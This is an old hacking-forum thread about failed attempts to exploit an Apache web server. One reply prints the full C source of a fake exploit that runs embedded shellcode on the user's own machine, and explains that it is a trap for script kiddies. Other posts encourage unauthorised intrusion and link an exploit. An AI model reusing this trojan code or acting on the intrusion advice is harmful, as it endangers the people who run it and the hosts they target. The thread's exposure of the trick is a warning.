newbie
Aug 23 2003, 09:07 PM
i exploited it once and tryed to connect through telnet
but it didnt connect
then i used scan500 to scan the apache hole and it was found so i tryed again and thrgouh netcat too but nothin
any soulotion?
Velle
Aug 23 2003, 09:49 PM
There's a good chance that hte host is firewalled
Just keep trying, you'll find something eventually
Just make sure you're not blocking any ports...
GAN_GR33N
Aug 23 2003, 10:20 PM
it is possible that it is not vulnerable. sometimes scanners will give you false positives. in my expireince using only a port scanner and then checking the results by hand is a much more solid way of doing it. this can be very difficult when checking a large network or drive by hacking( not the most noble effort) but works great for smaller jobs.
if the case of the firewall is true just alter the source code of the exploit to bind a shell to an open port.
newbie
Aug 24 2003, 09:46 AM
no it turned out to be 1.3.27 and i scanned 1.3.x
and the and i have a exploit only for 1.3.27 and below
FLW
Aug 24 2003, 12:32 PM
Which exploit only for 1.3.27 or below are you looking at?
shaun2k2
Aug 24 2003, 02:17 PM
Damn. When will people stop being such script kiddies. You *shouldn't* be trying to run these exploits if you do not even know what they do. It's dangerous, I promise you.
1) It could be harming your computer.
2) You don't know how it works, so you probably don't know enough to get yourself out of trouble.
This might sound like a flame, but it's not, honestly. Look at point 1). I say it could be harming your computer. In this case it IS.
Is this the exploit you're trying to use:
| CODE |
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};
int main(int *argc, char **argv)
{
int i;
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if((int)argc < 3 )
{
printf("usage: %s <target> <shell port>\n", argv[0]);
printf("ex: %s google.com 31337\n", argv[0]);
exit(0);
}
buffer = (char *) malloc(512 + 1024 + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
memcpy(&buffer[512 - strlen(shellcode)], shellcode,
strlen(shellcode));
buffer[512 + 1024] = ';';
buffer[512 + 1024 + 1] = '\0';
void(*b)()=(void*)shellcode;b();
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("Server doesn't exist\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Cannot open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("Attempting to Exploit...\n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("Success!!!\n");
else
printf("No go there tough guy!\n");
printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));
}
|
Well, if it is, you are ridiculous running it.
| QUOTE |
void(* ()=(void*)shellcode;b();
|
I told you that you shouldn't be trying to run them without programming knowledge. Do you know what that line of code does? It runs the shellcode on YOUR computer. Meaning that whatever the shellcode does, is happening to you. Meaning that if the shellcode makes a rootshell with no password, YOU are being fooled. This was a FAKE exploit, written by kiddies, to fool people.
CURRENTLY, the only vulnerability known in Apache 1.3.27 is something to do with stopping log files or something.
Sorry about this whole post....but you shouldn't run something if you don't know what it's doing guys
.
-Shaun.
newbie
Aug 24 2003, 02:33 PM
no its not it...
and i read the exploits briefly
to see the pattern if it looks weird i dont touch it
here's the exploit
http://geestart.de/test/apache-linux-ssl.cand btw your right that exploit i wouldnt recognize cuz i have poor knowledge
in exploits and i know basic cpp
im still looking for a normal socket programming tut
OneNight
Aug 24 2003, 02:40 PM
Thx for that reply Shaun. Well said. Good to have ur knowledgeable input on this.
shaun2k2
Aug 24 2003, 02:48 PM
Hmm. That exploit isn't for Apache 1.3.27, but I notice you realise that now.
-Shaun.
dozolax
Dec 20 2003, 03:28 AM
haha...u probably should check that first
